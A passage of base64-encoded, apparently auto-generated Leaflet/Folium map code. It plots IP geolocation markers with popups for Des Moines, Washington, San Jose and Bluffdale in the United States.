XJvdGF0ZS0wIiwgImljb24iOiAiZmxhc2giLCAiaWNvbkNvbG9yIjogIndoaXRlIiwgIm1hcmtlckNvbG9yIjogInJlZCIsICJwcmVmaXgiOiAiZ2x5cGhpY29uIn0KICAgICAgICAgICAgKTsKICAgICAgICAgICAgbWFya2VyXzRhNGJmMmQ4ODkxNjQ3ODRhODJhMGFhMTZiYmY2ZjZhLnNldEljb24oaWNvbl80NzZkN2QyNGJhZWU0YjIyOGJlMmVmNWFiY2U2ZTIwOCk7CiAgICAgICAgCiAgICAKICAgICAgICB2YXIgcG9wdXBfNzAxMGNmY2JlZjdjNGIxYTg5N2Y3YTVmNjhmNWYzYWMgPSBMLnBvcHVwKHsibWF4V2lkdGgiOiAiMTAwJSJ9KTsKCiAgICAgICAgCiAgICAgICAgICAgIHZhciBodG1sXzk1NmI4YTBiMTU5YjQyMzY5NWY1NmQ0MzYyYzRkYTBjID0gJChgPGRpdiBpZD0iaHRtbF85NTZiOGEwYjE1OWI0MjM2OTVmNTZkNDM2MmM0ZGEwYyIgc3R5bGU9IndpZHRoOiAxMDAuMCU7IGhlaWdodDogMTAwLjAlOyI+Q291bnRyeUNvZGU9VVMsIENvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMsIFN0YXRlPUlvd2EsIENpdHk9RGVzIE1vaW5lcywgTG9uZ2l0dWRlPS05My42MTEyLCBMYXRpdHVkZT00MS42MDA2LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiA1Mi4xNzMuMjYuMTgxPC9kaXY+YClbMF07CiAgICAgICAgICAgIHBvcHVwXzcwMTBjZmNiZWY3YzRiMWE4OTdmN2E1ZjY4ZjVmM2FjLnNldENvbnRlbnQoaHRtbF85NTZiOGEwYjE1OWI0MjM2OTVmNTZkNDM2MmM0ZGEwYyk7CiAgICAgICAgCgogICAgICAgIG1hcmtlcl80YTRiZjJkODg5MTY0Nzg0YTgyYTBhYTE2YmJmNmY2YS5iaW5kUG9wdXAocG9wdXBfNzAxMGNmY2JlZjdjNGIxYTg5N2Y3YTVmNjhmNWYzYWMpCiAgICAgICAgOwoKICAgICAgICAKICAgIAogICAgCiAgICAgICAgICAgIG1hcmtlcl80YTRiZjJkODg5MTY0Nzg0YTgyYTBhYTE2YmJmNmY2YS5iaW5kVG9vbHRpcCgKICAgICAgICAgICAgICAgIGA8ZGl2PgogICAgICAgICAgICAgICAgICAgICBEZXMgTW9pbmVzLCBVbml0ZWQgU3RhdGVzCiAgICAgICAgICAgICAgICAgPC9kaXY+YCwKICAgICAgICAgICAgICAgIHsic3RpY2t5IjogdHJ1ZX0KICAgICAgICAgICAgKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFya2VyXzY4ZmNhMTY1Zjg3MjQ2ZmRiMmYzODA2ZjJmODdiNTVmID0gTC5tYXJrZXIoCiAgICAgICAgICAgICAgICBbMzguNzA5NSwgLTc4LjE1MzldLAogICAgICAgICAgICAgICAge30KICAgICAgICAgICAgKS5hZGRUbyhtYXBfMjNjNmJmYTBlY2ZkNDY3MjliZGE0OTE3ZTZmMWM4MWMpOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBpY29uX2VjZDQzNjIyZDdiMjQzNDdiMzhkYTdmYTY2YmY0YTIxID0gTC5Bd2Vzb21lTWFya2Vycy5pY29uKAogICAgICAgICAgICAgICAgeyJleHRyYUNsYXNzZXMiOiAiZmEtcm90YXRlLTAiLCAiaWNvbiI6ICJkZXNrdG9wIiwgImljb25Db2xvciI6ICJ3aGl0ZSIsICJtYXJrZXJDb2xvciI6ICJkYXJrYmx1ZSIsICJwcmVmaXgiOiAiZmEifQogICAgICAgICAgICApOwogICAgICAgICAgICBtYXJrZXJfNjhmY2ExNjVmODcyNDZmZGIyZjM4MDZmMmY4N2I1NWYuc2V0SWNvbihpY29uX2VjZDQzNjIyZDdiMjQzNDdiMzhkYTdmYTY2YmY0YTIxKTsKICAgICAgICAKICAgIAogICAgICAgIHZhciBwb3B1cF9lMTM3NGRhZWQ3Njk0MmU5YWJlNzVjYWE4M2UxZGFmYyA9IEwucG9wdXAoeyJtYXhXaWR0aCI6ICIxMDAlIn0pOwoKICAgICAgICAKICAgICAgICAgICAgdmFyIGh0bWxfOTA5YmVmZjg2NTAxNDY1MzhkYzQ0NGJlZjg0OTczZDEgPSAkKGA8ZGl2IGlkPSJodG1sXzkwOWJlZmY4NjUwMTQ2NTM4ZGM0NDRiZWY4NDk3M2QxIiBzdHlsZT0id2lkdGg6IDEwMC4wJTsgaGVpZ2h0OiAxMDAuMCU7Ij5Db3VudHJ5Q29kZT1VUywgQ291bnRyeU5hbWU9VW5pdGVkIFN0YXRlcywgU3RhdGU9VmlyZ2luaWEsIENpdHk9V2FzaGluZ3RvbiwgTG9uZ2l0dWRlPS03OC4xNTM5LCBMYXRpdHVkZT0zOC43MDk1LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiBuYTwvZGl2PmApWzBdOwogICAgICAgICAgICBwb3B1cF9lMTM3NGRhZWQ3Njk0MmU5YWJlNzVjYWE4M2UxZGFmYy5zZXRDb250ZW50KGh0bWxfOTA5YmVmZjg2NTAxNDY1MzhkYzQ0NGJlZjg0OTczZDEpOwogICAgICAgIAoKICAgICAgICBtYXJrZXJfNjhmY2ExNjVmODcyNDZmZGIyZjM4MDZmMmY4N2I1NWYuYmluZFBvcHVwKHBvcHVwX2UxMzc0ZGFlZDc2OTQyZTlhYmU3NWNhYTgzZTFkYWZjKQogICAgICAgIDsKCiAgICAgICAgCiAgICAKICAgIAogICAgICAgICAgICBtYXJrZXJfNjhmY2ExNjVmODcyNDZmZGIyZjM4MDZmMmY4N2I1NWYuYmluZFRvb2x0aXAoCiAgICAgICAgICAgICAgICBgPGRpdj4KICAgICAgICAgICAgICAgICAgICAgV2FzaGluZ3RvbiwgVW5pdGVkIFN0YXRlcwogICAgICAgICAgICAgICAgIDwvZGl2PmAsCiAgICAgICAgICAgICAgICB7InN0aWNreSI6IHRydWV9CiAgICAgICAgICAgICk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIG1hcmtlcl80ZGQ3ZmZkNzBiZGM0ODVlYjIxYzc1MWVjN2E1M2ExMCA9IEwubWFya2VyKAogICAgICAgICAgICAgICAgWzM3LjMzODgsIC0xMjEuODkxNF0sCiAgICAgICAgICAgICAgICB7fQogICAgICAgICAgICApLmFkZFRvKG1hcF8yM2M2YmZhMGVjZmQ0NjcyOWJkYTQ5MTdlNmYxYzgxYyk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIGljb25fMGZlMDAzNGU5ZWFkNGI3NWFhYmFjODlhZmIxMGM3NWYgPSBMLkF3ZXNvbWVNYXJrZXJzLmljb24oCiAgICAgICAgICAgICAgICB7ImV4dHJhQ2xhc3NlcyI6ICJmYS1yb3RhdGUtMCIsICJpY29uIjogImRlc2t0b3AiLCAiaWNvbkNvbG9yIjogIndoaXRlIiwgIm1hcmtlckNvbG9yIjogImRhcmtibHVlIiwgInByZWZpeCI6ICJmYSJ9CiAgICAgICAgICAgICk7CiAgICAgICAgICAgIG1hcmtlcl80ZGQ3ZmZkNzBiZGM0ODVlYjIxYzc1MWVjN2E1M2ExMC5zZXRJY29uKGljb25fMGZlMDAzNGU5ZWFkNGI3NWFhYmFjODlhZmIxMGM3NWYpOwogICAgICAgIAogICAgCiAgICAgICAgdmFyIHBvcHVwX2EyZDExZDVlNDVlZjRkZDU5MzVkNTVmNjRkYTQwZTUyID0gTC5wb3B1cCh7Im1heFdpZHRoIjogIjEwMCUifSk7CgogICAgICAgIAogICAgICAgICAgICB2YXIgaHRtbF84YWRhYzdhN2FhMTE0YjYwOTlkOTI2ZDI2NjkwNmNkYSA9ICQoYDxkaXYgaWQ9Imh0bWxfOGFkYWM3YTdhYTExNGI2MDk5ZDkyNmQyNjY5MDZjZGEiIHN0eWxlPSJ3aWR0aDogMTAwLjAlOyBoZWlnaHQ6IDEwMC4wJTsiPkNvdW50cnlDb2RlPVVTLCBDb3VudHJ5TmFtZT1Vbml0ZWQgU3RhdGVzLCBTdGF0ZT1DYWxpZm9ybmlhLCBDaXR5PVNhbiBKb3NlLCBMb25naXR1ZGU9LTEyMS44OTE0LCBMYXRpdHVkZT0zNy4zMzg4LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiBuYTwvZGl2PmApWzBdOwogICAgICAgICAgICBwb3B1cF9hMmQxMWQ1ZTQ1ZWY0ZGQ1OTM1ZDU1ZjY0ZGE0MGU1Mi5zZXRDb250ZW50KGh0bWxfOGFkYWM3YTdhYTExNGI2MDk5ZDkyNmQyNjY5MDZjZGEpOwogICAgICAgIAoKICAgICAgICBtYXJrZXJfNGRkN2ZmZDcwYmRjNDg1ZWIyMWM3NTFlYzdhNTNhMTAuYmluZFBvcHVwKHBvcHVwX2EyZDExZDVlNDVlZjRkZDU5MzVkNTVmNjRkYTQwZTUyKQogICAgICAgIDsKCiAgICAgICAgCiAgICAKICAgIAogICAgICAgICAgICBtYXJrZXJfNGRkN2ZmZDcwYmRjNDg1ZWIyMWM3NTFlYzdhNTNhMTAuYmluZFRvb2x0aXAoCiAgICAgICAgICAgICAgICBgPGRpdj4KICAgICAgICAgICAgICAgICAgICAgU2FuIEpvc2UsIFVuaXRlZCBTdGF0ZXMKICAgICAgICAgICAgICAgICA8L2Rpdj5gLAogICAgICAgICAgICAgICAgeyJzdGlja3kiOiB0cnVlfQogICAgICAgICAgICApOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBtYXJrZXJfMTY5ZGJjNzU0NDA2NGYzY2IwYTBkYjA0ODE4NTFlZWYgPSBMLm1hcmtlcigKICAgICAgICAgICAgICAgIFszNy4zMzg4LCAtMTIxLjg5MTRdLAogICAgICAgICAgICAgICAge30KICAgICAgICAgICAgKS5hZGRUbyhtYXBfMjNjNmJmYTBlY2ZkNDY3MjliZGE0OTE3ZTZmMWM4MWMpOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBpY29uX2YzMmMxYzQ1YjU0MzQyYjNiOWQ0YjAxODU3YTRlMWI2ID0gTC5Bd2Vzb21lTWFya2Vycy5pY29uKAogICAgICAgICAgICAgICAgeyJleHRyYUNsYXNzZXMiOiAiZmEtcm90YXRlLTAiLCAiaWNvbiI6ICJkZXNrdG9wIiwgImljb25Db2xvciI6ICJ3aGl0ZSIsICJtYXJrZXJDb2xvciI6ICJkYXJrYmx1ZSIsICJwcmVmaXgiOiAiZmEifQogICAgICAgICAgICApOwogICAgICAgICAgICBtYXJrZXJfMTY5ZGJjNzU0NDA2NGYzY2IwYTBkYjA0ODE4NTFlZWYuc2V0SWNvbihpY29uX2YzMmMxYzQ1YjU0MzQyYjNiOWQ0YjAxODU3YTRlMWI2KTsKICAgICAgICAKICAgIAogICAgICAgIHZhciBwb3B1cF8wNTgzYmM2NTY2OTU0NjZjOWIyY2ZjM2EyYzY2NzFhYyA9IEwucG9wdXAoeyJtYXhXaWR0aCI6ICIxMDAlIn0pOwoKICAgICAgICAKICAgICAgICAgICAgdmFyIGh0bWxfMWE4NjdlOGMzODhhNDI3OWE4NGUwODgyNzhmYWU1MTQgPSAkKGA8ZGl2IGlkPSJodG1sXzFhODY3ZThjMzg4YTQyNzlhODRlMDg4Mjc4ZmFlNTE0IiBzdHlsZT0id2lkdGg6IDEwMC4wJTsgaGVpZ2h0OiAxMDAuMCU7Ij5Db3VudHJ5Q29kZT1VUywgQ291bnRyeU5hbWU9VW5pdGVkIFN0YXRlcywgU3RhdGU9Q2FsaWZvcm5pYSwgQ2l0eT1TYW4gSm9zZSwgTG9uZ2l0dWRlPS0xMjEuODkxNCwgTGF0aXR1ZGU9MzcuMzM4OCwgVHlwZT1nZW9sb2NhdGlvbjxicj5JUDogbmE8L2Rpdj5gKVswXTsKICAgICAgICAgICAgcG9wdXBfMDU4M2JjNjU2Njk1NDY2YzliMmNmYzNhMmM2NjcxYWMuc2V0Q29udGVudChodG1sXzFhODY3ZThjMzg4YTQyNzlhODRlMDg4Mjc4ZmFlNTE0KTsKICAgICAgICAKCiAgICAgICAgbWFya2VyXzE2OWRiYzc1NDQwNjRmM2NiMGEwZGIwNDgxODUxZWVmLmJpbmRQb3B1cChwb3B1cF8wNTgzYmM2NTY2OTU0NjZjOWIyY2ZjM2EyYzY2NzFhYykKICAgICAgICA7CgogICAgICAgIAogICAgCiAgICAKICAgICAgICAgICAgbWFya2VyXzE2OWRiYzc1NDQwNjRmM2NiMGEwZGIwNDgxODUxZWVmLmJpbmRUb29sdGlwKAogICAgICAgICAgICAgICAgYDxkaXY+CiAgICAgICAgICAgICAgICAgICAgIFNhbiBKb3NlLCBVbml0ZWQgU3RhdGVzCiAgICAgICAgICAgICAgICAgPC9kaXY+YCwKICAgICAgICAgICAgICAgIHsic3RpY2t5IjogdHJ1ZX0KICAgICAgICAgICAgKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFya2VyXzhlZjQ1MzM0NmJlYzRiMDBhZjg4NjNkNzk3NTQxY2ZjID0gTC5tYXJrZXIoCiAgICAgICAgICAgICAgICBbMzguNzA5NSwgLTc4LjE1MzldLAogICAgICAgICAgICAgICAge30KICAgICAgICAgICAgKS5hZGRUbyhtYXBfMjNjNmJmYTBlY2ZkNDY3MjliZGE0OTE3ZTZmMWM4MWMpOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBpY29uXzk0N2FhMDIzYTBlMDQyZGQ5NDZhYTJkYTk2NGFmNDA0ID0gTC5Bd2Vzb21lTWFya2Vycy5pY29uKAogICAgICAgICAgICAgICAgeyJleHRyYUNsYXNzZXMiOiAiZmEtcm90YXRlLTAiLCAiaWNvbiI6ICJkZXNrdG9wIiwgImljb25Db2xvciI6ICJ3aGl0ZSIsICJtYXJrZXJDb2xvciI6ICJkYXJrYmx1ZSIsICJwcmVmaXgiOiAiZmEifQogICAgICAgICAgICApOwogICAgICAgICAgICBtYXJrZXJfOGVmNDUzMzQ2YmVjNGIwMGFmODg2M2Q3OTc1NDFjZmMuc2V0SWNvbihpY29uXzk0N2FhMDIzYTBlMDQyZGQ5NDZhYTJkYTk2NGFmNDA0KTsKICAgICAgICAKICAgIAogICAgICAgIHZhciBwb3B1cF9mNTA0YjRmYmUyMjA0MzRmOTZlMTFkODU4N2VmNGUxOSA9IEwucG9wdXAoeyJtYXhXaWR0aCI6ICIxMDAlIn0pOwoKICAgICAgICAKICAgICAgICAgICAgdmFyIGh0bWxfYTEwMjViZmY2MDFkNDhjNmJkMDc0NTBiOThhMjA1NmYgPSAkKGA8ZGl2IGlkPSJodG1sX2ExMDI1YmZmNjAxZDQ4YzZiZDA3NDUwYjk4YTIwNTZmIiBzdHlsZT0id2lkdGg6IDEwMC4wJTsgaGVpZ2h0OiAxMDAuMCU7Ij5Db3VudHJ5Q29kZT1VUywgQ291bnRyeU5hbWU9VW5pdGVkIFN0YXRlcywgU3RhdGU9VmlyZ2luaWEsIENpdHk9V2FzaGluZ3RvbiwgTG9uZ2l0dWRlPS03OC4xNTM5LCBMYXRpdHVkZT0zOC43MDk1LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiBuYTwvZGl2PmApWzBdOwogICAgICAgICAgICBwb3B1cF9mNTA0YjRmYmUyMjA0MzRmOTZlMTFkODU4N2VmNGUxOS5zZXRDb250ZW50KGh0bWxfYTEwMjViZmY2MDFkNDhjNmJkMDc0NTBiOThhMjA1NmYpOwogICAgICAgIAoKICAgICAgICBtYXJrZXJfOGVmNDUzMzQ2YmVjNGIwMGFmODg2M2Q3OTc1NDFjZmMuYmluZFBvcHVwKHBvcHVwX2Y1MDRiNGZiZTIyMDQzNGY5NmUxMWQ4NTg3ZWY0ZTE5KQogICAgICAgIDsKCiAgICAgICAgCiAgICAKICAgIAogICAgICAgICAgICBtYXJrZXJfOGVmNDUzMzQ2YmVjNGIwMGFmODg2M2Q3OTc1NDFjZmMuYmluZFRvb2x0aXAoCiAgICAgICAgICAgICAgICBgPGRpdj4KICAgICAgICAgICAgICAgICAgICAgV2FzaGluZ3RvbiwgVW5pdGVkIFN0YXRlcwogICAgICAgICAgICAgICAgIDwvZGl2PmAsCiAgICAgICAgICAgICAgICB7InN0aWNreSI6IHRydWV9CiAgICAgICAgICAgICk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIG1hcmtlcl81MjY5NWI4YTVhZWQ0N2NhODQ1ZGQ0YWQ3Yzc1ZDBjMCA9IEwubWFya2VyKAogICAgICAgICAgICAgICAgWzQxLjYwMDYsIC05My42MTEyXSwKICAgICAgICAgICAgICAgIHt9CiAgICAgICAgICAgICkuYWRkVG8obWFwXzIzYzZiZmEwZWNmZDQ2NzI5YmRhNDkxN2U2ZjFjODFjKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgaWNvbl85ZTliZWE5MjZlNmM0NjYxOWJmZjI2YzRkZjU1ZTgyYyA9IEwuQXdlc29tZU1hcmtlcnMuaWNvbigKICAgICAgICAgICAgICAgIHsiZXh0cmFDbGFzc2VzIjogImZhLXJvdGF0ZS0wIiwgImljb24iOiAiZGVza3RvcCIsICJpY29uQ29sb3IiOiAid2hpdGUiLCAibWFya2VyQ29sb3IiOiAiZGFya2JsdWUiLCAicHJlZml4IjogImZhIn0KICAgICAgICAgICAgKTsKICAgICAgICAgICAgbWFya2VyXzUyNjk1YjhhNWFlZDQ3Y2E4NDVkZDRhZDdjNzVkMGMwLnNldEljb24oaWNvbl85ZTliZWE5MjZlNmM0NjYxOWJmZjI2YzRkZjU1ZTgyYyk7CiAgICAgICAgCiAgICAKICAgICAgICB2YXIgcG9wdXBfOGIzOTZhOTExNzhiNDJlNWJiZTZlZDZlZWQ5MzgwOWUgPSBMLnBvcHVwKHsibWF4V2lkdGgiOiAiMTAwJSJ9KTsKCiAgICAgICAgCiAgICAgICAgICAgIHZhciBodG1sX2RkZjlkODU3MDU5NDRmYWJhNTFlMWE5OThhZDMwZGY0ID0gJChgPGRpdiBpZD0iaHRtbF9kZGY5ZDg1NzA1OTQ0ZmFiYTUxZTFhOTk4YWQzMGRmNCIgc3R5bGU9IndpZHRoOiAxMDAuMCU7IGhlaWdodDogMTAwLjAlOyI+Q291bnRyeUNvZGU9VVMsIENvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMsIFN0YXRlPUlvd2EsIENpdHk9RGVzIE1vaW5lcywgTG9uZ2l0dWRlPS05My42MTEyLCBMYXRpdHVkZT00MS42MDA2LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiBuYTwvZGl2PmApWzBdOwogICAgICAgICAgICBwb3B1cF84YjM5NmE5MTE3OGI0MmU1YmJlNmVkNmVlZDkzODA5ZS5zZXRDb250ZW50KGh0bWxfZGRmOWQ4NTcwNTk0NGZhYmE1MWUxYTk5OGFkMzBkZjQpOwogICAgICAgIAoKICAgICAgICBtYXJrZXJfNTI2OTViOGE1YWVkNDdjYTg0NWRkNGFkN2M3NWQwYzAuYmluZFBvcHVwKHBvcHVwXzhiMzk2YTkxMTc4YjQyZTViYmU2ZWQ2ZWVkOTM4MDllKQogICAgICAgIDsKCiAgICAgICAgCiAgICAKICAgIAogICAgICAgICAgICBtYXJrZXJfNTI2OTViOGE1YWVkNDdjYTg0NWRkNGFkN2M3NWQwYzAuYmluZFRvb2x0aXAoCiAgICAgICAgICAgICAgICBgPGRpdj4KICAgICAgICAgICAgICAgICAgICAgRGVzIE1vaW5lcywgVW5pdGVkIFN0YXRlcwogICAgICAgICAgICAgICAgIDwvZGl2PmAsCiAgICAgICAgICAgICAgICB7InN0aWNreSI6IHRydWV9CiAgICAgICAgICAgICk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIG1hcmtlcl8zNDAwODJjMDlkYjA0Mzg1YjM5ZjJmYWNjMzc5ZmI0ZCA9IEwubWFya2VyKAogICAgICAgICAgICAgICAgWzQwLjQ5NTMsIC0xMTEuOTQzOV0sCiAgICAgICAgICAgICAgICB7fQogICAgICAgICAgICApLmFkZFRvKG1hcF8yM2M2YmZhMGVjZmQ0NjcyOWJkYTQ5MTdlNmYxYzgxYyk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIGljb25fZTk1YjhhYjFhZGNkNDQyZmE1YWFhNjQ4N2JkMjU5N2MgPSBMLkF3ZXNvbWVNYXJrZXJzLmljb24oCiAgICAgICAgICAgICAgICB7ImV4dHJhQ2xhc3NlcyI6ICJmYS1yb3RhdGUtMCIsICJpY29uIjogImRlc2t0b3AiLCAiaWNvbkNvbG9yIjogIndoaXRlIiwgIm1hcmtlckNvbG9yIjogImRhcmtibHVlIiwgInByZWZpeCI6ICJmYSJ9CiAgICAgICAgICAgICk7CiAgICAgICAgICAgIG1hcmtlcl8zNDAwODJjMDlkYjA0Mzg1YjM5ZjJmYWNjMzc5ZmI0ZC5zZXRJY29uKGljb25fZTk1YjhhYjFhZGNkNDQyZmE1YWFhNjQ4N2JkMjU5N2MpOwogICAgICAgIAogICAgCiAgICAgICAgdmFyIHBvcHVwX2ViZGZlYjdjN2I2MjQ1Yzg4MzRkYWQ3ZmJkNzY2MDQ1ID0gTC5wb3B1cCh7Im1heFdpZHRoIjogIjEwMCUifSk7CgogICAgICAgIAogICAgICAgICAgICB2YXIgaHRtbF80ZjRiZTE0ZjdmYWY0YTcxYjAyYTVhN2ViMDgxNDY4YiA9ICQoYDxkaXYgaWQ9Imh0bWxfNGY0YmUxNGY3ZmFmNGE3MWIwMmE1YTdlYjA4MTQ2OGIiIHN0eWxlPSJ3aWR0aDogMTAwLjAlOyBoZWlnaHQ6IDEwMC4wJTsiPkNvdW50cnlDb2RlPVVTLCBDb3VudHJ5TmFtZT1Vbml0ZWQgU3RhdGVzLCBTdGF0ZT1VdGFoLCBDaXR5PUJsdWZmZGFsZSwgTG9uZ2l0dWRlPS0xMTEuOTQzOSwgTGF0aXR1ZGU9NDAuNDk1MywgVHlwZT1nZW9sb2NhdGlvbjxicj5JUDogbmE8L2Rpdj5gKVswXTsKICAgICAgICAgICAgcG9wdXBfZWJkZmViN2M3YjYyNDVjODgzNGRhZDdmYmQ3NjYwNDUuc2V0Q29udGVudChodG1sXzRmNGJlMTRmN2ZhZjRhNzFiMDJhNWE3ZWIwODE0NjhiKTsKICAgICAgICAKCiAgICAgICAgbWFya2VyXzM0MDA4MmMwOWRiMDQzODViMzlmMmZhY2MzNzlmYjRkLmJpbmRQb3B1cChwb3B1cF9lYmRmZWI3YzdiNjI0NWM4ODM0ZGFkN2ZiZDc2NjA0NSkKICAgICAgICA7CgogICAgICAgIAogICAgCiAgICAKICAgICAgICAgICAgbWFya2VyXzM0MDA4MmMwOWRiMDQzODViMzlmMmZhY2MzNzlmYjRkLmJpbmRUb29sdGlwKAogICAgICAgICAgICAgICAgYDxkaXY+CiAgICAgICAgICAgICAgICAgICAgIEJsdWZmZGFsZSwgVW5pdGVkIFN0YXRlcwogICAgICAgICAgICAgICAgIDwvZGl2PmAsCiAgICAgICAgICAgICAgICB7InN0aWNreSI6IHRydWV9CiAgICAgICAgICAgICk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIG1hcmtlcl9iMzBiNmIyY2E5OWE0ZDdlYTVlNzEyNmQyZGFiMjcxMiA9IEwubWFya2VyKAogICAgICAgICAgICAgICAgWzQxLjYwMDYsIC05My42MTEyXSwKICAgICAgICAgICAgICAgIHt9CiAgICAgICAgICAgICkuYWRkVG8obWFwXzIzYzZiZmEwZWNmZDQ2NzI5YmRhNDkxN2U2ZjFjODFjKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgaWNvbl9iYzIxOGVkNWIyN2I0YWRmOWU4Y2EzOGI0OWIyMjJlMCA9IEwuQXdlc29tZU1hcmtlcnMuaWNvbigKICAgICAgICAgICAgICAgIHsiZXh0cmFDbGFzc2VzIjogImZhLXJvdGF0ZS0wIiwgImljb24iOiAiZGVza3RvcCIsICJpY29uQ29sb3IiOiAid2hpdGUiLCAibWFya2VyQ29sb3IiOiAiZGFya2JsdWUiLCAicHJlZml4IjogImZhIn0KICAgICAgICAgICAgKTsKICAgICAgICAgICAgbWFya2VyX2IzMGI2YjJjYTk5YTRkN2VhNWU3MTI2ZDJkYWIyNzEyLnNldEljb24oaWNvbl9iYzIxOGVkNWIyN2I0YWRmOWU4Y2EzOGI0OWIyMjJlMCk7CiAgICAgICAgCiAgICAKICAgICAgICB2YXIgcG9wdXBfMWZkZWE0ZDEyOGQyNDBmMGIzMmJmNzZjODI5YjJhNGUgPSBMLnBvcHVwKHsibWF4V2lkdGgiOiAiMTAwJSJ9KTsKCiAgICAgICAgCiAgICAgICAgICAgIHZhciBodG1sXzQyOWZjMjE4MzRjMjQ0YmFhNDA3NGFiOTZhOTZkMzkyID0gJChgPGRpdiBpZD0iaHRtbF80MjlmYzIxODM0YzI0NGJhYTQwNzRhYjk2YTk2ZDM5MiIgc3R5bGU9IndpZHRoOiAxMDAuMCU7IGhlaWdodDogMTAwLjAlOyI+Q291bnRyeUNvZGU9VVMsIENvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMsIFN0YXRlPUlvd2EsIENpdHk9RGVzIE1vaW5lcywgTG9uZ2l0dWRlPS05My42MTEyLCBMYXRpdHVkZT00MS42MDA2LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiBuYTwvZGl2PmApWzBdOwogICAgICAgICAgICBwb3B1cF8xZmRlYTRkMTI4ZDI0MGYwYjMyYmY3NmM4MjliMmE0ZS5zZXRDb250ZW50KGh0bWxfNDI5ZmMyMTgzNGMyNDRiYWE0MDc0YWI5NmE5NmQzOTIpOwogICAgICAgIAoKICAgICAgICBtYXJrZXJfYjMwYjZiMmNhOTlhNGQ3ZWE1ZTcxMjZkMmRhYjI3MTIuYmluZFBvcHVwKHBvcHVwXzFmZGVhNGQxMjhkMjQwZjBiMzJiZjc2YzgyOWIyYTRlKQogICAgICAgIDsKCiAgICAgICAgCiAgICAKICAgIAogICAgICAgICAgICBtYXJrZXJfYjMwYjZiMmNhOTlhNGQ3ZWE1ZTcxMjZkMmRhYjI3MTIuYmluZFRvb2x0aXAoCiAgICAgICAgICAgICAgICBgPGRpdj4KICAgICAgICAgICAgICAgICAgICAgRGVzIE1vaW5lcywgVW5pdGVkIFN0YXRlcwogICAgICAgICAgICAgICAgIDwvZGl2PmAsCiAgICAgICAgICAgICAgICB7InN0aWNreSI6IHRydWV9CiAgICAgICAgICAgICk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIG1hcmtlcl9lOGNhNWE4Mzg5OGQ0OGYwOTIzMzdhZDBlNzA0M2FlNSA9IEwubWFya2VyKAogICAgICAgICAgICAgICAgWzQxLjYwMDYsIC05My42MTEyXSwKICAgICAgICAgICAgICAgIHt9CiAgICAgICAgICAgICkuYWRkVG8obWFwXzIzYzZiZmEwZWNmZDQ2NzI5YmRhNDkxN2U2ZjFjODFjKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgaWNvbl82YjlkM2IxMDRkMGM0MTM4OGU4NzY4YWFkZjgwYTYwMSA9IEwuQXdlc29tZU1hcmtlcnMuaWNvbigKICAgICAgICAgICAgICAgIHsiZXh0cmFDbGFzc2VzIjogImZhLXJvdGF0ZS0wIiwgImljb24iOiAiZGVza3RvcCIsICJpY29uQ29sb3IiOiAid2hpdGUiLCAibWFya2VyQ29sb3IiOiAiZGFya2JsdWUiLCAicHJlZml4IjogImZhIn0KICAgICAgICAgICAgKTsKICAgICAgICAgICAgbWFya2VyX2U4Y2E1YTgzODk4ZDQ4ZjA5MjMzN2FkMGU3MDQzYWU1LnNldEljb24oaWNvbl82YjlkM2IxMDRkMGM0MTM4OGU4NzY4YWFkZjgwYTYwMSk7CiAgICAgICAgCiAgICAKICAgICAgICB2YXIgcG9wdXBfNzU2NzUzNjIwZTcxNDM4ZDlkNGQ3NjYwYjY5MTQ3NWYgPSBMLnBvcHVwKHsibWF4V2lkdGgiOiAiMTAwJSJ9KTsKCiAgICAgICAgCiAgICAgICAgICAgIHZhciBodG1sXzIzN2JjNGFmMmNjMjQwY2ViZWUyOTFlMDIxODYwNjI5ID0gJChgPGRpdiBpZD0iaHRtbF8yMzdiYzRhZjJjYzI0MGNlYmVlMjkxZTAyMTg2MDYyOSIgc3R5bGU9IndpZHRoOiAxMDAuMCU7IGhlaWdodDogMTAwLjAlOyI+Q291bnRyeUNvZGU9VVMsIENvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMsIFN0YXRlPUlvd2EsIENpdHk9RGVzIE1vaW5lcywgTG9uZ2l0dWRlPS05My42MTEyLCBMYXRpdHVkZT00MS42MDA2LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiBuYTwvZGl2PmApWzBdOwogICAgICAgICAgICBwb3B1cF83NTY3NTM2MjBlNzE0MzhkOWQ0ZDc2NjBiNjkxNDc1Zi5zZXRDb250ZW50KGh0bWxfMjM3YmM0YWYyY2MyNDBjZWJlZTI5MWUwMjE4NjA2MjkpOwogICAgICAgIAoKICAgICAgICBtYXJrZXJfZThjYTVhODM4OThkNDhmMDkyMzM3YWQwZTcwNDNhZTUuYmluZFBvcHVwKHBvcHVwXzc1Njc1MzYyMGU3MTQzOGQ5ZDRkNzY2MGI2OTE0NzVmKQogICAgICAgIDsKCiAgICAgICAgCiAgICAKICAgIAogICAgICAgICAgICBtYXJrZXJfZThjYTVhODM4OThkNDhmMDkyMzM3YWQwZTcwNDNhZTUuYmluZFRvb2x0aXAoCiAgICAgICAgICAgICAgICBgPGRpdj4KICAgICAgICAgICAgICAgICAgICAgRGVzIE1vaW5lcywgVW5pdGVkIFN0YXRlcwogICAgICAg